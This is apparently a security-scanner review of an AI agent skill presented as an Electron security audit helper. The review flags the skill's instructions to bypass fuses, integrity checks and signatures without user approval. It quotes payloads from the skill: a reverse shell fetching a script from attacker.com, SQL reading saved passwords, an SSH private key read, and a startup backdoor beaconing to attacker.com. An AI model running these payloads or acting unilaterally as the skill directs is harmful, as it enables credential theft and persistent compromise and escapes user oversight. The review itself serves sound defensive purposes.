Electron客户端安全审查助手
Security checks across malware telemetry and agentic risk
Overview
This skill is framed as an Electron security audit helper, but its instructions push the agent to bypass protections, modify binaries, execute exploit payloads, steal local data, and even inject persistence without clear user approval or containment.
Avoid installing this skill on a normal workstation. If you need Electron security testing, use a controlled lab VM, a copy of the application, non-production accounts, and require explicit approval for every exploit, file modification, credential read, network callback, or code execution step.
VirusTotal
No VirusTotal findings
Risk analysis
Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.
The agent could alter or break an installed application, disable integrity protections, or run intrusive exploitation steps without a clear confirmation checkpoint.
The skill directs the agent to autonomously bypass protections and modify target application files without waiting for explicit user approval, creating high-impact tool-misuse risk.
“此技能必须主动解决遇到的所有障碍,不允许等用户指示… Fuse 挡路就 flip Fuse,ASAR 校验挡路就关校验,签名挡路就忽略签名… 备份原始文件后大胆修改,不要怕‘破坏’应用”
Do not install unless you are performing an authorized lab audit and can constrain the agent to read-only checks unless you explicitly approve each mutation.
If followed, the agent could run arbitrary commands or download and execute remote code on the user’s machine or a target system.
The reference material gives a concrete reverse-shell payload using child_process and a remote attacker URL, which is clearly unsafe executable behavior.
“PoC 3: 启动反弹 Shell… require('child_process').exec('powershell -nop -ep bypass -c \"IEX(New-Object Net.WebClient).DownloadString(\\\"http://attacker.com/shell.ps1\\\")\"')”Remove reverse-shell and arbitrary command-execution payloads; require harmless proof-of-concept commands and explicit user approval before running any code.
The agent could expose real session cookies, saved passwords, personal data, or application secrets from the local profile while trying to prove a finding.
The skill instructs analysis of local browser/Electron data stores that may contain saved passwords, tokens, cookies, and other private user data, without clear minimization or handling rules.
“Web Data… sqlite3 \"Web Data\" \"SELECT username_value, password_value FROM logins\"… [高危] logins 表可能包含保存的密码”
Require redaction, user-selected test profiles, and explicit consent before reading any local credential, cookie, storage, or password database.
The agent could cross account or privilege boundaries by using a trusted application to access keys, credentials, or execute code with unintended authority.
The guidance includes reading private keys and abusing a trusted signed Electron app for arbitrary code execution or privilege scenarios.
“PoC 2: 读取敏感文件… readFileSync('C:\\Users\\%USERNAME%\\.ssh\\id_rsa','utf8')… 攻击场景: 本地权限提升… 绕过应用白名单:利用已信任的签名应用执行任意代码”Limit testing to non-sensitive fixtures and require authorization boundaries, least-privilege execution, and no access to real private keys or account material.
If executed, the target application could be persistently modified to run unwanted code every time it starts.
The file explicitly documents persistent ASAR tampering and a startup backdoor beacon to an attacker-controlled endpoint.
“ASAR 篡改持久化… 在 main.js 顶部添加… // 后门: 每次启动时执行… exec('curl https://attacker.com/beacon?host=' + require('os').hostname());”Remove persistence/backdoor instructions entirely; security audit skills should demonstrate risks with reversible, non-networking, non-persistent test artifacts.
A single audit action could leave the application permanently weakened, unsigned, corrupted, or running patched behavior after the task ends.
The workflow modifies packaged application code and binary security fuses, which can affect future runs and propagate breakage or weakened security beyond the current review session.
“修改 main.js + 重打包… win.webContents.openDevTools… npx @electron/asar pack app_extracted/ app.asar… Fuse 翻转… EnableEmbeddedAsarIntegrityValidation=off”
Use disposable copies or isolated VMs only, and require rollback steps plus explicit approval before any repackaging or Fuse changes.